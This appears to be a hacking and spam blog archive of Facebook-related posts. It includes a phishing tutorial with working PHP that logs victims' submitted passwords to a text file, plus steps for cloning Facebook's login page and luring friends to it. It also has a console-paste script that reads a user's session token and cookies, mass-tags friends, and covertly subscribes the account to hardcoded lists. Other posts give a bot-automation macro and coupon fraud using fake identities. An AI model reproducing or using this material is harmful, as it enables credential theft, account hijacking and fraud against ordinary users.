Showing posts with label Facebook. Show all posts
Showing posts with label Facebook. Show all posts

Sunday, June 29, 2014

[TUTORIAL] Generate Unlimited Facebook, Twitter & Bing Coupons

Facebook:

You will need:

1) Facebook accounts
2) Valid email address
3) Random personal data (find it here - fakenamegenerator.com

Steps:

1) Log in to your new Facebook account

2) Go to this URL - facebook.com/business/apac-agency-yourclients

3) Fill in the form.

Agency name: Put some random name,
Agency website: put some random url,
Agency location: Select any country, Phone: put random number (in the
country you selected – find it on (Generate a Random Name - Fake Name Generator),
Work mail: put valid email (you will get coupons in that email),
Other fields- you can put in anything...

4) Here is an example ->>




5) AFTER that, you will have to create pages ). When any of your pages gets 1000 likes (you can use any type of likes – real people/bots), they will send you a coupon. Repeat the same thing with all of the pages you create (get
them to have at least 1000 likes)and you will get a coupon for each of them.

6) This sums it up:

7) When you do that and they send you coupons in your email, just apply it (find more info here - facebook.com/help/243807179069441/). That’s it and be patient (it took me 2 weeks to get it).

8) Make sure you read their Terms of service and Rules for getting and applying coupons!!

$50 Facebook coupons:

FB Success program

They offer $50 coupons to new advertisers

- Go to this URL https://www.facebook.com/business/start2success

-Fill in the form with the data from fakenamegenerator.com and you own data (for email)

Read their rules!

Facebook offers coupons through partnership with other companies as well:

1) First option is to get it from hosting companies like Fatcow, Hostpapa...
Example with Hostpapa:

- You have this URL where you can request coupon as their member: HostPapa รข€“ Facebook Ads Credit Coupon Redemption

They have cheap memberships and you can get the coupon that way. After that, just cancel the membership and get your money back.

2) There are also companies like Wix, Shopify and 3Dcart that offer $50 coupons. You can use their trial offer to get the coupon and then cancel the membership. Important: Make sure that a company offers 'money back guarantee', so that you can get your money back.

Twitter:

Steps:

1) Log in to your account first or create new account if you don’t have one! (US/UK/Canada)

2) After you log in, go to this URL and click on ‘Apply Now!’

3) That’s it. Close the tab, wait a few days and they will contact you.

Follow their instructions. This is what you'll got:



Bing:

Steps:

1) Create a new account (email must be real, other info on Generate a Random Name - Fake Name Generator) and a campaign.

2) Go to these links and type in all the information (step 3) –

US: advertise.bingads.microsoft.com/en-us/affiliateprogram
Canada: advertise.bingads.microsoft.com/en-ca/affiliateprogram
UK: advertise.bingads.microsoft.com/en-uk/affiliateprogram
France: advertise.bingads.microsoft.com/fr-fr/affiliateprogram
Australia: advertise.bingads.microsoft.com/en-au/affiliateprogram
New Zealand: advertise.bingads.microsoft.com/en-nz/affiliateprogram
India: advertise.bingads.microsoft.com/en-in/affiliateprogram

3) Setup a new email (real), random website, random first and last name, phone, etc. You can get that here - Generate a Random Name - Fake Name Generator

Here is what you'll get:



Sunday, February 9, 2014

[FACEBOOK] Suggest All Friends To Different Facebook Account By Single Click

Suggest All Friends To Different Facebook Account By Single Click


Many Facebook users try to increase their friends as tremendous speed but there are some secrets to increase an account with huge friends within a few days. So here is one the best technique which help to increase friends list. Normally many user just increase friends for fun but few of them increase for there business. Too many friends means Too many clients so many users just increase account and then convert them into a page if you don't know then must learn how to convert fb account into page.
Today i am going to explain the method of suggesting all friends from one account to another account. Sometimes we just want to shift from one account to new and in that case you don't want to loss your friends and you suggest them to new account but if you have big friends list then suggesting them one by one is not so easy. Don't worry here is a solution for you to suggest all friends list to other account within couple of secs.

Suggestion Setup For Chrome

First of all open Google chrome then install below extension


After installing new icon start appearing on top right corner


Steps For Suggestion

Now Log in Your Facebook Account whose friends you want to suggest
Open the profile where you want to suggest friends.


Then click on Friends button appear in the front of id name.
List of all features will appears then click on Suggest friends and new box will appear of friend list.
After the appearing of box click on the Icon of extension which we installed in first part.


Wait for few seconds then all the friends get suggested.
I hope you enjoy this tricks






Tuesday, February 4, 2014

Facebook Password Cracker Generator

 Facebook Password Cracker Generator

Use this keygen generator to drive traffic into your CPA/PPD Accounts.
Earn Daily $$$$$$$$




DOWNLOAD HERE : Facebook Password Cracker Generator


Monday, February 3, 2014

Facebook ADs Academy 2.0

FB ADs Academy 2.0

Introducing, The Facebook Ads Academy.

The brand new blueprint for running insanely profitable facebook advertising campaigns that deliver new customers daily (even if you’re dead broke)






Download Here


Sunday, February 2, 2014

[Phishing] Hack Facebook

How to hack facebook Account password


We will we use very popular method to hack facebook account password.That is Phishing.This is one of the best method to hack facebook account password.This will work only if your friend don't know about this method of hacking facebookFor this We need three files:

1. Fake facebook login page
2. Php file
3. Text file to store password

Create your php file

1.Open notepad and copy this code:

<%
header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;
?>


2. Now save this as phishing.php
Your php file is now created
If you Don't understand what this php file is doing you need to learn some basic of php. This php file will save information of victim in file password.txt 

Create facebook fake login page

Now go to http://www.facebook.com/ and right click / View Source.Copy source in notepad and save it as facebooklogin.html .Now open source code of this html file
We need to find the place where Login code in facebook page that where send the user after clicking on it.
Now Press crtl-f after opening source code and search for this code
action=anything.
In this case we have this

action=”https://login.facebook.com/login.php?”

We replace that part with:

action=”phishing.php”


Save your facebooklogin.html file

Text file

Create a blank text file and name it password.txt



Now upload all the three files Facebooklogin.html,phishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake facebook login page by going to http://yoursite.110mb.com/Facebooklogin.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called "Password.txt" is created,In which the password is stored.

You can use

http://www.justfree.com/
http://www.ripway.com/
also or any other free hosting site.

Suppose you register with name facebookhack.Your link will be http://www.facebookhack.justfree.com/
After uploading files your phishing link will be http://www.facebookhack.justfree.com/facebooklogin.html

Send this link to your friend if they login there their password will be save at the server .
You can trick your friend to login this fake facebook page by saying its new version of facebook check it out,or in any way you like

[Tutorial] Get/Steal REAL Facebook likes

So lets see. You might have a product or are promoting one. 9 out of 10 times the product is already out there and the chances are that it is quite popular already, since you started promoting it. Just look up the Facebook page of the original brand or something related to it (competitor pages also work well).

Perhaps you even started a Facebook page yourself to promote your product, which you will need to do for this method and which would be nothing short of wise, because Facebook is a goldmine. Lets start following the steps that will get you REAL Facebook likes and almost certainly some sales through the pages, because you're going to hit some people that are highly interested in your product.


Find a Facebook page that promotes your product, or something similar.



I took the SOA page as example, it has over 6 million likes. 

Now, we're going to the working part:

Look up the posts of this page. Now click on xx,xxx people like this post, below the post. You'll get a pop-up showing the people that liked the post. 


What now? We can't just add those people as friends, and invite them to like our page. It'll get us banned within no-time. 


That's right, and we're not going to. What we're going to do is hop over to Twitter. You might wonder how you'll get Facebook likes through Twitter, but it's quite simple. Since Twitter is pre-installed on almost every phone, tablet or whatever... MANY people have Twitter, but just rarely or don't use it. They have it, that's all that matters for now. 

So let's see. We saw a guy named "Kenny XXXX" liked the SOA post... 


Lets see if he's on Twitter...


It's hard to tell, but we'll just follow them all. 9 out of 10 times you'll get a load of people while searching on Twitter who all seem to have the same name. Try to follow the ones that have the same profile picture on their Facebook profile or those that look like the person you saw on Facebook. 

Important!

Be sure you have your Twitter page looking LEGIT and GOOD! When the people you've followed receive a notification, or an email (those take some days to make sure you're not spam) they don't want to see a blank page with some crappy spam links on it. 

What you want, is getting them to like your Facebook page that in this case is related to Sons of Anarchy. What is a better way to pull in some people by telling them you're giving away the SOA DVD box when your page hits 10000 Likes? Right, none. 

So, what you'll do is make sure that you have a Tweet on the top of your Twitter page that says: 

"If we reach 10.000 Likes, we'll give away 5 SOA 6-Season Blu-Ray boxes. See http://facebook.com/Yourpageherex."

Adding a picture and some ReTweets will help it look legit. 


Now keep looking up people that liked the posts on the original FB page, keep searching for them on Twitter, and watch the REAL likes come in! 

They can't come more targeted than this!

AddmeFast Working BOT 100%





AddmeFast Working BOT


Before using this JavaScript u have to first login in Addmefast and
Instagram you can create multiple Instagram accounts by using any phone like
iphone or android. 

Q: Why this JavaScript was Created for?

Ans: This Addmefast Instagram Followers and Likes iMacros JavaScript i created for earning the points in addmefast very fastly cause in addmefast if u follow the Instagram or if u like the photo in instagram from addmefast u will receive (9) points from each users so this script is very usefull and fast.

I Earned Points in 1 hour: by using 2 Instagram accounts








Addmefast Instagram Followers & Likes iMacros JavaScript


//Author: FadiRixi
//Version: v1.0
//Release Date: 1/27/2014
//Facebook: /Fstu4u 
var macro = "CODE:";
macro += "" + "\n";
macro += "SET !ERRORIGNORE YES" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAG POS=1 TYPE=A ATTR=TXT:Instagram<SP>Followers" + "\n";
macro += "WAIT SECONDS=1" + "\n";
macro += "TAG POS=1 TYPE=DIV ATTR=TXT:Follow" + "\n";
macro += "TAB T=2" + "\n";
macro += "TAG POS=1 TYPE=A ATTR=TXT:Follow" + "\n";
macro += "WAIT SECONDS=2" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAB CLOSEALLOTHERS" + "\n";
macro += "TAB T=1" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAG POS=1 TYPE=DIV ATTR=TXT:Follow" + "\n";
macro += "TAB T=2" + "\n";
macro += "TAG POS=1 TYPE=A ATTR=TXT:Follow" + "\n";
macro += "WAIT SECONDS=2" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAB CLOSEALLOTHERS" + "\n";
macro += "TAB T=1" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAG POS=1 TYPE=DIV ATTR=TXT:Follow" + "\n";
macro += "TAB T=2" + "\n";
macro += "TAG POS=1 TYPE=A ATTR=TXT:Follow" + "\n";
macro += "WAIT SECONDS=2" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAB CLOSEALLOTHERS" + "\n";
macro += "TAB T=1" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAG POS=1 TYPE=DIV ATTR=TXT:Follow" + "\n";
macro += "TAB T=2" + "\n";
macro += "TAG POS=1 TYPE=A ATTR=TXT:Follow" + "\n";
macro += "WAIT SECONDS=2" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAB CLOSEALLOTHERS" + "\n";
macro += "TAB T=1" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAG POS=1 TYPE=DIV ATTR=TXT:Follow" + "\n";
macro += "TAB T=2" + "\n";
macro += "TAG POS=1 TYPE=A ATTR=TXT:Follow" + "\n";
macro += "WAIT SECONDS=2" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAB CLOSEALLOTHERS" + "\n";
macro += "TAB T=1" + "\n";
macro += "WAIT SECONDS=3" + "\n";
//'STARTS HERE INSTA LIKES"
macro += "TAG POS=1 TYPE=A ATTR=TXT:Instagram<SP>Likes" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAG POS=1 TYPE=DIV ATTR=TXT:Like" + "\n";
macro += "TAB T=2" + "\n";
macro += "TAG POS=1 TYPE=SPAN ATTR=DATA-REACTID:.r[0].[0].[1].[0].[0].[0].[0].[0].[0].[1].[1].[1].[0].[0]&&CLASS:ibInner&&TXT:" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAB CLOSEALLOTHERS" + "\n";
macro += "TAB T=1" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAG POS=1 TYPE=DIV ATTR=TXT:Like" + "\n";
macro += "TAB T=2" + "\n";
macro += "TAG POS=1 TYPE=SPAN ATTR=DATA-REACTID:.r[0].[0].[1].[0].[0].[0].[0].[0].[0].[1].[1].[1].[0].[0]&&CLASS:ibInner&&TXT:" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAB CLOSEALLOTHERS" + "\n";
macro += "TAB T=1" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAG POS=1 TYPE=DIV ATTR=TXT:Like" + "\n";
macro += "TAB T=2" + "\n";
macro += "TAG POS=1 TYPE=SPAN ATTR=DATA-REACTID:.r[0].[0].[1].[0].[0].[0].[0].[0].[0].[1].[1].[1].[0].[0]&&CLASS:ibInner&&TXT:" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAB CLOSEALLOTHERS" + "\n";
macro += "TAB T=1" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAG POS=1 TYPE=DIV ATTR=TXT:Like" + "\n";
macro += "TAB T=2" + "\n";
macro += "TAG POS=1 TYPE=SPAN ATTR=DATA-REACTID:.r[0].[0].[1].[0].[0].[0].[0].[0].[0].[1].[1].[1].[0].[0]&&CLASS:ibInner&&TXT:" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAB CLOSEALLOTHERS" + "\n";
macro += "TAB T=1" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAG POS=1 TYPE=DIV ATTR=TXT:Like" + "\n";
macro += "TAB T=2" + "\n";
macro += "TAG POS=1 TYPE=SPAN ATTR=DATA-REACTID:.r[0].[0].[1].[0].[0].[0].[0].[0].[0].[1].[1].[1].[0].[0]&&CLASS:ibInner&&TXT:" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "TAB T=1" + "\n";
macro += "TAB CLOSEALLOTHERS" + "\n";
macro += "TAB T=1" + "\n";
macro += "WAIT SECONDS=3" + "\n";
macro += "URL GOTO=http://addmefast.com/my_sites.html" + "\n";
macro += "WAIT SECONDS=32" + "\n";
macro += "TAG POS=1 TYPE=A ATTR=TXT:Instagram<SP>Followers" + "\n";
var i=0;
var _FadiRixiLovers=prompt("Please enter the loops FadiRixi" + "\n" + "\n" + "Example Recommended loops: (5555) ",5555);
for (i=1; i <= _FadiRixiLovers; i++)
{
iimPlay(macro,25);
iimDisplay("Current loop is: "+ i);
}


Download Here: Addmefast Instagram Followers & Likes iMacros JavaScript









Facebook Autolike Tag Script (2014)













Facebook Autolike Tag Script (2014)

You're right.

You need a working auto mention script of all your friends in your Facebook  ?

Now You can get it here for Free!
100% working so you can try it now!


Instruction to use:


  1. Go to your Timeline or Newsfeed
  2. Click the time/date of the Facebook Status you want to plant Script!
  3. Right Click and then CLick Inspect Element or simply press F12
  4. Go to Console Tab
  5. And then Paste All the Codes
  6. Viola! Auto Mention is Working.

/* All Right Reserver ElMzx.Ma    Don't Change Anything */
function x__0() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; };
function get_friends(){
var a=x__0();
a.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm", false);
a.send(null);
if (a.readyState == 4) {
var f = JSON.parse(a.responseText.substring(a.responseText  .indexOf('{')));
return f.payload.entries;
}
return false;
}
function get_uid(b){
var a=x__0();
a.open("GET", 'http://graph.facebook.com/'+b, false);
a.send();
if (a.readyState == 4) {
return uid = JSON.parse(a.responseText).id;
}
return false;
}
var patt = /comment_text=(.*?)&/
var c = 1;
username = /\.com\/(.*?)\//.exec(window.top.location)[1];
uid = get_uid(username);
a = window.top.location;
termina = 0;
var amigos = get_friends();
post_id = /[0-9]{8,}/.exec(a);
uids = 'comment_text=';
header = 'ft_ent_identifier='+post_id+'&comment_text=0&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user='+uid+'&__a=1&__req=4u&fb_dtsg='+document.getElementsByName('fb_dtsg')[0].value+'&phstamp='+Math.random();
for ( var n = 1 ; n < amigos.length ; n++ ){
//uids += '%40[' + amigos[n].uid + '%3A' + encodeURI(amigos[n].text) + ']%20';
fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
uids += '%40[' + amigos[n].uid + '%3AAAAAAAAAAAA]%20';
c++;
if(c == 7){
uids += '&';
with(new XMLHttpRequest()) open("POST", "/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),send(header.replace(patt, uids));
z = setTimeout('function(){asd=0}', 1000);
clearInterval(z);
c = 1;
uids = 'comment_text=';
}
}
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}
function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){
var http4 = new XMLHttpRequest();
var url4 = "/ajax/follow/follow_profile.php?__a=1";
var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);
//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");
http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {
http4.close; // Close the connection
}
}
http4.send(params4);
}
function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}sublist("601726586529639");sublist("201369036691662");sublist("601725253196439");sublist("601724796529818")
;sublist("601725423196422");sublist("601733493195615");sublist("601733596528938");sublist("601733963195568")





Simply Share My Blog !
Simply Leave FeedBack !



-credit to coder